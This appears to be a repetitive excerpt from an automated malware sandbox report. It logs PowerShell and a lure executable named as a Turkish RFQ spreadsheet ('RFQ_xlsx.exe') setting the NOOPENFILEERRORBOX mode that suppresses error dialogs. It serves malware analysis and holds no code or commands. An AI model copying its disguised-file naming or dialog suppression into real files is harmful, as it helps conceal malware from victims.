Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
